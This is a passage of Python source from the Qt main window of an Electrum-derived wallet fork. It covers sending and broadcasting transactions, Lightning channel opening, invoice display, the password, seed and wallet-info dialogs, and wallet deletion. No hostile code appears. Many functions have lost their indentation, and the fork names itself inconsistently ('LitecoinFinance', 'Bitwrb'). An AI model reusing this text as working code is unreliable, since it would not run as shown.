        """Run the on-chain payment flow: fee confirmation dialog, optional
        advanced preview, then sign and broadcast."""
        # trustedcoin requires this
        if run_hook('abort_send', self):
            return
        # Sweeping external keys (e.g. from a private key import)?
        is_sweep = bool(external_keypairs)
        make_tx = lambda fee_est: self.wallet.make_unsigned_transaction(
            coins=inputs,
            outputs=outputs,
            fee=fee_est,
            is_sweep=is_sweep)
        output_values = [x.value for x in outputs]
        # '!' marks a spend-max output; at most one is allowed.
        if output_values.count('!') > 1:
            self.show_error(_("More than one output set to spend max"))
            return
        output_value = '!' if '!' in output_values else sum(output_values)
        conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep)
        if conf_dlg.not_enough_funds:
            # Check if we had enough funds excluding fees,
            # if so, still provide opportunity to set lower fees.
            if not conf_dlg.have_enough_funds_assuming_zero_fees():
                text = self.get_text_not_enough_funds_mentioning_frozen()
                self.show_message(text)
                return
        # shortcut to advanced preview (after "enough funds" check!)
        if self.config.get('advanced_preview'):
            preview_dlg = PreviewTxDialog(
                window=self,
                make_tx=make_tx,
                external_keypairs=external_keypairs,
                output_value=output_value)
            preview_dlg.show()
            return
        cancelled, is_send, password, tx = conf_dlg.run()
        if cancelled:
            return
        if is_send:
            self.save_pending_invoice()
            def sign_done(success):
                if success:
                    self.broadcast_or_show(tx)
            self.sign_tx_with_password(tx, callback=sign_done, password=password,
                                       external_keypairs=external_keypairs)
        else:
            # User chose "preview" instead of sending directly.
            preview_dlg = PreviewTxDialog(
                window=self,
                make_tx=make_tx,
                external_keypairs=external_keypairs,
                output_value=output_value)
            preview_dlg.show()
    def broadcast_or_show(self, tx: Transaction):
        """Broadcast *tx* when possible; otherwise just display it."""
        if not tx.is_complete():
            # Unsigned/partial tx: show it so the user can finish signing.
            self.show_transaction(tx)
            return
        if not self.network:
            # Offline: inform the user and still show the signed tx.
            self.show_error(_("You can't broadcast a transaction without a live network connection."))
            self.show_transaction(tx)
            return
        self.broadcast_transaction(tx)
    @protected
    def sign_tx(self, tx, *, callback, external_keypairs, password):
        # Password-prompting wrapper (via @protected) around
        # sign_tx_with_password().
        self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs)
    def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None):
        '''Sign the transaction in a separate thread. When done, calls
        the callback with a success code of True or False.
        '''
        def on_success(result):
            callback(True)
        def on_failure(exc_info):
            self.on_error(exc_info)
            callback(False)
        # Plugins (trustedcoin) may wrap the success handler.
        on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success
        if external_keypairs:
            # can sign directly
            task = partial(tx.sign, external_keypairs)
        else:
            task = partial(self.wallet.sign_transaction, tx, password)
        msg = _('Signing transaction...')
        WaitingDialog(self, msg, task, on_success, on_failure)
    def broadcast_transaction(self, tx: Transaction):
        """Broadcast *tx* from a background thread, handling BIP70 payment
        ACKs, and report the outcome in the GUI thread."""
        def broadcast_thread():
            # non-GUI thread
            pr = self.payment_request
            if pr and pr.has_expired():
                self.payment_request = None
                return False, _("Invoice has expired")
            try:
                self.network.run_from_another_thread(self.network.broadcast_transaction(tx))
            except TxBroadcastError as e:
                return False, e.get_message_for_gui()
            except BestEffortRequestFailed as e:
                return False, repr(e)
            # success
            txid = tx.txid()
            if pr:
                # BIP70 flow: send the payment message and wait for the ACK.
                self.payment_request = None
                refund_address = self.wallet.get_receiving_address()
                coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address)
                fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
                ack_status, ack_msg = fut.result(timeout=20)
                self.logger.info(f"Payment ACK: {ack_status}. Ack message: {ack_msg}")
            return True, txid
        # Capture current TL window; override might be removed on return
        parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin))
        def broadcast_done(result):
            # GUI thread
            if result:
                success, msg = result
                if success:
                    parent.show_message(_('Payment sent.') + '\n' + msg)
                    self.invoice_list.update()
                else:
                    msg = msg or ''
                    parent.show_error(msg)
        WaitingDialog(self, _('Broadcasting transaction...'),
                      broadcast_thread, broadcast_done, self.on_error)
def mktx_for_open_channel(self, *, funding_sat, node_id):
coins = self.get_coins(nonlocal_only=True)
make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel(
coins=coins,
funding_sat=funding_sat,
node_id=node_id,
fee_est=fee_est)
return make_tx
    def open_channel(self, connect_str, funding_sat, push_amt):
        """Open a Lightning channel to the peer in *connect_str*: confirm the
        funding tx fee, then run the channel-establishment flow."""
        try:
            node_id, rest = extract_nodeid(connect_str)
        except ConnStringFormatError as e:
            self.show_error(str(e))
            return
        # Warn when another wallet instance has a backup of this channel peer.
        if self.wallet.lnworker.has_conflicting_backup_with(node_id):
            msg = messages.MGS_CONFLICTING_BACKUP_INSTANCE
            if not self.question(msg):
                return
        # use ConfirmTxDialog
        # we need to know the fee before we broadcast, because the txid is required
        make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id)
        d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False)
        # disable preview button because the user must not broadcast tx before establishment_flow
        d.preview_button.setEnabled(False)
        cancelled, is_send, password, funding_tx = d.run()
        if not is_send:
            return
        if cancelled:
            return
        # read funding_sat from tx; converts '!' to int value
        funding_sat = funding_tx.output_value_for_address(ln_dummy_address())
        def task():
            # Runs off the GUI thread via WaitingDialog.
            return self.wallet.lnworker.open_channel(
                connect_str=connect_str,
                funding_tx=funding_tx,
                funding_sat=funding_sat,
                push_amt_sat=push_amt,
                password=password)
        def on_failure(exc_info):
            type_, e, traceback = exc_info
            self.show_error(_('Could not open channel: {}').format(repr(e)))
        WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure)
def on_open_channel_success(self, args):
chan, funding_tx = args
lnworker = self.wallet.lnworker
if not chan.has_onchain_backup():
backup_dir = self.config.get_backup_dir()
if backup_dir is not None:
self.show_message(_(f'Your wallet backup has been updated in {backup_dir}'))
else:
data = lnworker.export_channel_backup(chan.channel_id)
help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL)
self.show_qrcode(
data, _('Save channel backup'),
help_text=help_text,
show_copy_text_btn=True)
n = chan.constraints.funding_txn_minimum_depth
message = '\n'.join([
_('Channel established.'),
_('Remote peer ID') + ':' + chan.node_id.hex(),
_('This channel will be usable after {} confirmations').format(n)
])
if not funding_tx.is_complete():
message += '\n\n' + _('Please sign and broadcast the funding transaction')
self.show_message(message)
self.show_transaction(funding_tx)
else:
self.show_message(message)
    def query_choice(self, msg, choices):
        """Modally ask the user to pick one of *choices*; return the selected
        index, or None if the dialog was dismissed."""
        # Needed by QtHandler for hardware wallets
        dialog = WindowModalDialog(self.top_level_window())
        clayout = ChoicesLayout(msg, choices)
        vbox = QVBoxLayout(dialog)
        vbox.addLayout(clayout.layout())
        vbox.addLayout(Buttons(OkButton(dialog)))
        if not dialog.exec_():
            return None
        return clayout.selected_index()
    def lock_amount(self, b: bool) -> None:
        # Freeze/unfreeze the amount editor; the Max button is only
        # meaningful while the amount is editable.
        self.amount_e.setFrozen(b)
        self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.message_e]:
e.setFrozen(True)
self.lock_amount(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoices(self, keys):
for key in keys:
self.wallet.delete_invoice(key)
self.invoice_list.update()
    def payment_request_ok(self):
        """Fill the Send tab from a successfully fetched payment request
        (unless it was already paid)."""
        pr = self.payment_request
        if not pr:
            return
        key = pr.get_id()
        invoice = self.wallet.get_invoice(key)
        if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
            self.show_message("invoice already paid")
            self.do_clear()
            self.payment_request = None
            return
        self.payto_e.is_pr = True
        # Color the pay-to field by the request's expiry state.
        if not pr.has_expired():
            self.payto_e.setGreen()
        else:
            self.payto_e.setExpired()
        self.payto_e.setText(pr.get_requestor())
        self.amount_e.setAmount(pr.get_amount())
        self.message_e.setText(pr.get_memo())
        # signal to set fee
        self.amount_e.textEdited.emit("")
def payment_request_error(self):
pr = self.payment_request
if not pr:
return
self.show_message(pr.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request: 'paymentrequest.PaymentRequest'):
self.set_onchain(True)
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
    def parse_lightning_invoice(self, invoice):
        """Parse ln invoice, and prepare the send tab for it.

        Raises LnDecodeException when *invoice* cannot be decoded.
        """
        try:
            lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP)
        except Exception as e:
            raise LnDecodeException(e) from e
        pubkey = bh2u(lnaddr.pubkey.serialize())
        # Look for the 'd' (description) tag; default to '' when absent
        # (for/else runs when the loop finds no match).
        for k,v in lnaddr.tags:
            if k == 'd':
                description = v
                break
        else:
            description = ''
        self.payto_e.setFrozen(True)
        self.payto_e.setText(pubkey)
        self.message_e.setText(description)
        if lnaddr.get_amount_sat() is not None:
            self.amount_e.setAmount(lnaddr.get_amount_sat())
        #self.amount_e.textEdited.emit("")
        self.set_onchain(False)
    def set_onchain(self, b):
        # Switch the Send tab between on-chain and Lightning mode; the Max
        # button only makes sense for on-chain sends.
        self._is_onchain = b
        self.max_button.setEnabled(b)
    def pay_to_URI(self, URI):
        """Fill the Send tab from a BIP21 bitcoin: URI (or start the BIP70
        flow when the URI carries a request)."""
        if not URI:
            return
        try:
            out = util.parse_URI(URI, self.on_pr)
        except InvalidBitcoinURI as e:
            self.show_error(_("Error parsing URI") + f":\n{e}")
            return
        self.show_send_tab()
        self.payto_URI = out
        r = out.get('r')
        sig = out.get('sig')
        name = out.get('name')
        # A request URL or a signed request means a BIP70 fetch is underway.
        if r or (name and sig):
            self.prepare_for_payment_request()
            return
        address = out.get('address')
        amount = out.get('amount')
        label = out.get('label')
        message = out.get('message')
        # use label as description (not BIP21 compliant)
        if label and not message:
            message = label
        if address:
            self.payto_e.setText(address)
        if message:
            self.message_e.setText(message)
        if amount:
            self.amount_e.setAmount(amount)
            self.amount_e.textEdited.emit("")
def do_clear(self):
self.max_button.setChecked(False)
self.payment_request = None
self.payto_URI = None
self.payto_e.is_pr = False
self.set_onchain(False)
for e in [self.payto_e, self.message_e, self.amount_e]:
e.setText('')
e.setFrozen(False)
self.update_status()
run_hook('do_clear', self)
def set_frozen_state_of_addresses(self, addrs, freeze: bool):
self.wallet.set_frozen_state_of_addresses(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool):
utxos_str = {utxo.prevout.to_str() for utxo in utxos}
self.wallet.set_frozen_state_of_coins(utxos_str, freeze)
self.utxo_list.update()
def create_list_tab(self, l, toolbar=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
#vbox.setContentsMargins(0, 0, 0, 0)
#vbox.setSpacing(0)
if toolbar:
vbox.addLayout(toolbar)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
toolbar = l.create_toolbar(self.config)
tab = self.create_list_tab(l, toolbar)
toolbar_shown = bool(self.config.get('show_toolbar_addresses', False))
l.show_toolbar(toolbar_shown)
return tab
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = UTXOList(self)
return self.create_list_tab(self.utxo_list)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if not self.question(_("Do you want to remove {} from your wallet?").format(addr)):
return
try:
self.wallet.delete_address(addr)
except UserFacingException as e:
self.show_error(str(e))
else:
self.need_update.set() # history, addresses, coins
self.clear_receive_tab()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
def delete_contacts(self, labels):
if not self.question(_("Remove {} from your list of contacts?")
.format(" + ".join(labels))):
return
for label in labels:
self.contacts.pop(label)
self.history_list.update()
self.contact_list.update()
self.update_completions()
def show_onchain_invoice(self, invoice: OnchainInvoice):
amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit()
d = WindowModalDialog(self, _("Onchain Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
grid.addWidget(QLabel(amount_str), 1, 1)
if len(invoice.outputs) == 1:
grid.addWidget(QLabel(_("Address") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.get_address()), 2, 1)
else:
outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs))
grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0)
grid.addWidget(QLabel(outputs_str), 2, 1)
grid.addWidget(QLabel(_("Description") + ':'), 3, 0)
grid.addWidget(QLabel(invoice.message), 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.exp + invoice.time)), 4, 1)
if invoice.bip70:
pr = paymentrequest.PaymentRequest(bytes.fromhex(invoice.bip70))
pr.verify(self.contacts)
grid.addWidget(QLabel(_("Requestor") + ':'), 5, 0)
grid.addWidget(QLabel(pr.get_requestor()), 5, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 6, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 6, 1)
def do_export():
key = pr.get_id()
name = str(key) + '.bip70'
fn = getSaveFileName(
parent=self,
title=_("Save invoice to file"),
filename=name,
filter="*.bip70",
config=self.config,
)
if not fn:
return
with open(fn, 'wb') as f:
data = f.write(pr.raw)
self.show_message(_('BIP70 invoice saved as {}').format(fn))
exportButton = EnterButton(_('Export'), do_export)
buttons = Buttons(exportButton, CloseButton(d))
else:
buttons = Buttons(CloseButton(d))
vbox.addLayout(grid)
vbox.addLayout(buttons)
d.exec_()
def show_lightning_invoice(self, invoice: LNInvoice):
lnaddr = lndecode(invoice.invoice, expected_hrp=constants.net.SEGWIT_HRP)
d = WindowModalDialog(self, _("Lightning Invoice"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
grid.addWidget(QLabel(_("Node ID") + ':'), 0, 0)
grid.addWidget(QLabel(lnaddr.pubkey.serialize().hex()), 0, 1)
grid.addWidget(QLabel(_("Amount") + ':'), 1, 0)
amount_str = self.format_amount(invoice.get_amount_sat()) + ' ' + self.base_unit()
grid.addWidget(QLabel(amount_str), 1, 1)
grid.addWidget(QLabel(_("Description") + ':'), 2, 0)
grid.addWidget(QLabel(invoice.message), 2, 1)
grid.addWidget(QLabel(_("Hash") + ':'), 3, 0)
payhash_e = ButtonsLineEdit(lnaddr.paymenthash.hex())
payhash_e.addCopyButton(self.app)
payhash_e.setReadOnly(True)
vbox.addWidget(payhash_e)
grid.addWidget(payhash_e, 3, 1)
if invoice.exp:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(invoice.time + invoice.exp)), 4, 1)
vbox.addLayout(grid)
invoice_e = ShowQRTextEdit(config=self.config)
invoice_e.addCopyButton(self.app)
invoice_e.setText(invoice.invoice)
vbox.addWidget(invoice_e)
vbox.addLayout(Buttons(CloseButton(d),))
d.exec_()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.db.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
'lnutil': lnutil,
})
c = commands.Commands(
config=self.config,
daemon=self.gui_object.daemon,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config','daemon']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
    def create_status_bar(self):
        """Build the main window status bar: balance text, search box, and
        the update/password/preferences/seed/lightning/network buttons."""
        sb = QStatusBar()
        sb.setFixedHeight(35)
        self.balance_label = QLabel("Loading wallet...")
        self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
        self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
        sb.addWidget(self.balance_label)
        self.search_box = QLineEdit()
        self.search_box.textChanged.connect(self.do_search)
        self.search_box.hide()
        sb.addPermanentWidget(self.search_box)
        # hidden by default; shown when an update notification arrives
        self.update_check_button = QPushButton("")
        self.update_check_button.setFlat(True)
        self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
        self.update_check_button.setIcon(read_QIcon("update.png"))
        self.update_check_button.hide()
        sb.addPermanentWidget(self.update_check_button)
        self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog)
        sb.addPermanentWidget(self.password_button)
        sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog))
        self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog)
        sb.addPermanentWidget(self.seed_button)
        self.lightning_button = StatusBarButton(read_QIcon("lightning.png"), _("Lightning Network"), self.gui_object.show_lightning_dialog)
        sb.addPermanentWidget(self.lightning_button)
        self.update_lightning_icon()
        self.status_button = None
        # the network button only exists when running with a network (not offline)
        if self.network:
            self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), self.gui_object.show_network_dialog)
            sb.addPermanentWidget(self.status_button)
        run_hook('create_status_bar', sb)
        self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list(None))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lightning_icon(self):
if not self.wallet.has_lightning():
self.lightning_button.setVisible(False)
return
if self.network is None or self.network.channel_db is None:
self.lightning_button.setVisible(False)
return
self.lightning_button.setVisible(True)
cur, total, progress_percent = self.network.lngossip.get_sync_progress_estimate()
# self.logger.debug(f"updating lngossip sync progress estimate: cur={cur}, total={total}")
progress_str = "??%"
if progress_percent is not None:
progress_str = f"{progress_percent}%"
if progress_percent and progress_percent >= 100:
self.lightning_button.setMaximumWidth(25)
self.lightning_button.setText('')
self.lightning_button.setToolTip(_("The Lightning Network graph is fully synced."))
else:
self.lightning_button.setMaximumWidth(25 + 5 * char_width_in_lineedit())
self.lightning_button.setText(progress_str)
self.lightning_button.setToolTip(_("The Lightning Network graph is syncing...\n"
"Payments are more likely to succeed with a more complete graph."))
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
    def change_password_dialog(self):
        """Change, set, or disable the wallet password.

        Hardware wallets derive the storage-encryption secret from the device
        (XPUB_PASSWORD scheme); software wallets prompt for old/new passwords.
        """
        from electrum.storage import StorageEncryptionVersion
        if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
            from .password_dialog import ChangePasswordDialogForHW
            d = ChangePasswordDialogForHW(self, self.wallet)
            ok, encrypt_file = d.run()
            if not ok:
                return
            try:
                hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
            except UserCancelled:
                return
            except BaseException as e:
                self.logger.exception('')
                self.show_error(repr(e))
                return
            # the device-derived secret serves as both old and new password
            old_password = hw_dev_pw if self.wallet.has_password() else None
            new_password = hw_dev_pw if encrypt_file else None
        else:
            from .password_dialog import ChangePasswordDialogForSW
            d = ChangePasswordDialogForSW(self, self.wallet)
            ok, old_password, new_password, encrypt_file = d.run()
            if not ok:
                return
        try:
            self.wallet.update_password(old_password, new_password, encrypt_storage=encrypt_file)
        except InvalidPassword as e:
            self.show_error(str(e))
            return
        except BaseException:
            self.logger.exception('Failed to update password')
            self.show_error(_('Failed to update password'))
            return
        msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
        self.show_message(msg, title=_("Success"))
        self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def init_lightning_dialog(self, dialog):
assert not self.wallet.has_lightning()
if self.wallet.can_have_deterministic_lightning():
msg = _(
"Lightning is not enabled because this wallet was created with an old version of Electrum LitecoinFinance. "
"Create lightning keys?")
else:
msg = _(
"Warning: this wallet type does not support channel recovery from seed. "
"You will need to backup your wallet everytime you create a new wallet. "
"Create lightning keys?")
if self.question(msg):
self._init_lightning_dialog(dialog=dialog)
@protected
def _init_lightning_dialog(self, *, dialog, password):
dialog.close()
self.wallet.init_lightning(password=password)
self.update_lightning_icon()
self.show_message(_('Lightning keys have been initialized.'))
    def show_wallet_info(self):
        """Show the "Wallet Information" dialog: name/type/script type, seed
        availability, keystore details, lightning status/node id, and the
        master public key(s) with derivation paths."""
        dialog = WindowModalDialog(self, _("Wallet Information"))
        dialog.setMinimumSize(800, 100)
        vbox = QVBoxLayout()
        wallet_type = self.wallet.db.get('wallet_type', '')
        if self.wallet.is_watching_only():
            wallet_type += ' [{}]'.format(_('watching-only'))
        seed_available = _('False')
        if self.wallet.has_seed():
            seed_available = _('True')
            ks = self.wallet.keystore
            assert isinstance(ks, keystore.Deterministic_KeyStore)
            seed_available += f" ({ks.get_seed_type()})"
        keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
        grid = QGridLayout()
        basename = os.path.basename(self.wallet.storage.path)
        grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
        grid.addWidget(QLabel(basename), 0, 1)
        grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
        grid.addWidget(QLabel(wallet_type), 1, 1)
        grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
        grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
        grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
        grid.addWidget(QLabel(str(seed_available)), 3, 1)
        # multisig wallets list their keystores per cosigner further below
        if len(keystore_types) <= 1:
            grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
            ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
            grid.addWidget(QLabel(ks_type), 4, 1)
        # lightning
        grid.addWidget(QLabel(_('Lightning') + ':'), 5, 0)
        from .util import IconLabel
        if self.wallet.has_lightning():
            if self.wallet.lnworker.has_deterministic_node_id():
                grid.addWidget(QLabel(_('Enabled')), 5, 1)
            else:
                label = IconLabel(text='Enabled, non-recoverable channels')
                label.setIcon(read_QIcon('nocloud'))
                grid.addWidget(label, 5, 1)
                if self.wallet.db.get('seed_type') == 'segwit':
                    msg = _("Your channels cannot be recovered from seed, because they were created with an old version of Electrum Bitwrb. "
                            "This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
                            "If you want this wallet to have recoverable channels, you must close your existing channels and restore this wallet from seed")
                else:
                    msg = _("Your channels cannot be recovered from seed. "
                            "This means that you must save a backup of your wallet everytime you create a new channel.\n\n"
                            "If you want to have recoverable channels, you must create a new wallet with an Electrum LitecoinFinance seed")
                grid.addWidget(HelpButton(msg), 5, 3)
            grid.addWidget(QLabel(_('Lightning Node ID:')), 7, 0)
            # TODO: ButtonsLineEdit should have a addQrButton method
            nodeid_text = self.wallet.lnworker.node_keypair.pubkey.hex()
            nodeid_e = ButtonsLineEdit(nodeid_text)
            qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png"
            nodeid_e.addButton(qr_icon, lambda: self.show_qrcode(nodeid_text, _("Node ID")), _("Show QR Code"))
            nodeid_e.addCopyButton(self.app)
            nodeid_e.setReadOnly(True)
            nodeid_e.setFont(QFont(MONOSPACE_FONT))
            grid.addWidget(nodeid_e, 8, 0, 1, 4)
        else:
            if self.wallet.can_have_lightning():
                grid.addWidget(QLabel('Not enabled'), 5, 1)
                button = QPushButton(_("Enable"))
                button.pressed.connect(lambda: self.init_lightning_dialog(dialog))
                grid.addWidget(button, 5, 3)
            else:
                grid.addWidget(QLabel(_("Not available for this wallet.")), 5, 1)
                grid.addWidget(HelpButton(_("Lightning is currently restricted to HD wallets with p2wpkh addresses.")), 5, 2)
        vbox.addLayout(grid)
        labels_clayout = None
        if self.wallet.is_deterministic():
            keystores = self.wallet.get_keystores()
            # one stacked page per keystore, switched by the chooser below
            ks_stack = QStackedWidget()
            def select_ks(index):
                ks_stack.setCurrentIndex(index)
            # only show the combobox in case multiple accounts are available
            if len(keystores) > 1:
                def label(idx, ks):
                    if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
                        return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
                    else:
                        return _("keystore") + f' {idx+1}'
                labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
                on_click = lambda clayout: select_ks(clayout.selected_index())
                labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
                vbox.addLayout(labels_clayout.layout())
            for ks in keystores:
                ks_w = QWidget()
                ks_vbox = QVBoxLayout()
                ks_vbox.setContentsMargins(0, 0, 0, 0)
                ks_w.setLayout(ks_vbox)
                mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
                mpk_text.setMaximumHeight(150)
                mpk_text.addCopyButton(self.app)
                run_hook('show_xpub_button', mpk_text, ks)
                der_path_hbox = QHBoxLayout()
                der_path_hbox.setContentsMargins(0, 0, 0, 0)
                der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
                der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
                der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
                der_path_hbox.addWidget(der_path_text)
                der_path_hbox.addStretch()
                ks_vbox.addWidget(QLabel(_("Master Public Key")))
                ks_vbox.addWidget(mpk_text)
                ks_vbox.addLayout(der_path_hbox)
                ks_stack.addWidget(ks_w)
            select_ks(0)
            vbox.addWidget(ks_stack)
        vbox.addStretch(1)
        btn_export_info = run_hook('wallet_info_buttons', self, dialog)
        btn_close = CloseButton(dialog)
        btns = Buttons(btn_export_info, btn_close)
        vbox.addLayout(btns)
        dialog.setLayout(vbox)
        dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
